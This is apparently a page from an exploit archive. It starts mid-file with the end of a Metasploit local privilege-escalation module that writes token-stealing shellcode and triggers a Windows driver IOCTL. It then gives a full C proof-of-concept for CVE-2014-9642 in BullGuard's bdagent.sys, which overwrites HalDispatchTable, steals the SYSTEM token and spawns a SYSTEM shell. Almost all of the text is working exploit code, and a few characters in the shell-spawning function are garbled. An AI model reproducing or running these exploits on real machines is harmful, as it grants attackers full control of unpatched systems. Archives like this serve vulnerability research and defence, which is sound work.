'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') if handle.nil? fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device") end print_status("Storing the shellcode in memory...") this_proc = session.sys.process.open session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE") unless this_proc.memory.writable?(0x1000) fail_with(Failure::Unknown, 'Failed to allocate memory') end buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00" sc = token_stealing_shellcode(target, nil, nil, false) # move up the stack frames looking for nt!KiSystemServicePostCall sc << "\x31\xc9" # xor ecx, ecx sc << "\x89\xeb" # mov ebx, ebp # count_frames sc << "\x41" # inc ecx sc << "\xf7\x43\x04\x00\x00\x00\x80" # test dword [ebx+4], 0x80000000 sc << "\x8b\x1b" # mov ebx, dword [ebx] sc << "\x75\xf4" # jne short count_frames sc << "\x49" # dec ecx # loop_frames sc << "\x49" # dec ecx sc << "\x89\xec" # mov esp, ebp sc << "\x5d" # pop ebp sc << "\x83\xf9\x00" # cmp ecx, 0 sc << "\x75\xf7" # jne loop_frames sc << "\x31\xc0" # xor eax, eax sc << "\xc3" # ret this_proc.memory.write(0x28, "\x87\xff\xff\x38") this_proc.memory.write(0x38, "\x00\x00") this_proc.memory.write(0x1100, buf) this_proc.memory.write(0x2b, "\x00\x00") this_proc.memory.write(0x2000, sc) print_status("Triggering the vulnerability...") session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0) #session.railgun.kernel32.CloseHandle(handle) # CloseHandle will never return, so skip it print_status("Checking privileges after exploitation...") unless is_system? fail_with(Failure::Unknown, "The exploitation wasn't successful") end print_good("Exploitation successful!") unless execute_shellcode(payload.encoded, nil, this_proc.pid) fail_with(Failure::Unknown, 'Error while executing the payload') end end end Source
  25. /* Exploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - http://www.bullguard.com/ Tested Version - 14.1.285.4 Driver Version - 1.0.0.6 - BdAgent.sys Tested on OS - 32bit Windows XP SP3 OSVDB - http://www.osvdb.org/show/osvdb/114478 CVE ID - CVE-2014-9642 Vendor fix url - http://www.bullguard.com/about/release-notes.aspx Fixed Version - 15.0.288.1 Fixed driver ver - 1.0.0.7 Note ---- Overwritten HAL dispatch table after exploit kd> dps nt!HalDispatchTable l c 8054ccb8 00000003 8054ccbc 00340000 8054ccc0 00010000 8054ccc4 0a060002 8054ccc8 ee657645 8054cccc 00000001 8054ccd0 00000001 8054ccd4 867c1bf0 8054ccd8 80613f7b nt!IoSetPartitionInformation 8054ccdc 806141ef nt!IoWritePartitionTable 8054cce0 8052d157 nt!CcHasInactiveViews 8054cce4 804e42d1 nt!ObpTraceDepth+0x19 7 pointers get overwritten. Since input buffer is in our control and pointers are static in XP I've triggered the overwrite again restoring the pointers. */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( DWORD ProfileSource, PULONG Interval); typedef void (*FUNCTPTR)(); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 Away from the kernel }; BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable "\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation "\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation "\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots "\x00\x00\x00\x00" // 8054ccc8 00000000 "\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR "\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters "\xe5\x4a\x5c\x80"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable DWORD HalDispatchTableAddress() { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; DWORD HalDispatchTable; CHAR kFullName[256]; PVOID kBase = NULL; LPSTR kName; HMODULE Kernel; FUNCTPTR Hal; ULONG len; NTSTATUS status; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); if (!status) { printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); return -1; } pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); if(pModuleInfo == NULL) { printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); memset(kFullName, 0x00, sizeof(kFullName)); strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); kBase = pModuleInfo->Module[0].Base; printf("[i] Kernel base name %s\n", kFullName); kName = strrchr(kFullName, '\\'); Kernel = LoadLibraryA(++kName); if(Kernel == NULL) { printf("[-] Failed to load kernel base\n\n"); return -1; } Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); if(Hal == NULL) { printf("[-] Failed to find HalDispatchTable\n\n"); return -1; } printf("[i] HalDispatchTable address 0x%08x\n", Hal); printf("[i] Kernel handle 0x%08x\n", Kernel); printf("[i] Kernel base address 0x%08x\n", kBase); HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); if(!HalDispatchTable) { printf("[-] Failed to calculate HalDispatchTable\n\n"); return -1; } return HalDispatchTable; } int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(?, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, ?)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtQueryIntervalProfile NtQueryIntervalProfile; LPVOID input[1] = {0}; LPVOID addrtoshell; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n"); printf(" Tested on Windows XP SP3 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "bdagent"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); memset(addrtoshell, 0x90, BUFSIZE); memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); input[0] = addrtoshell; // input buffer contents gets written to our output buffer address printf("[+] Input buffer contents %08x\n", input[0]); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); printf("[+] Restoring Hal dispatch table pointers\n\n"); DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); CloseHandle(hDevice); return 0; } Source
×
×
  • Create New...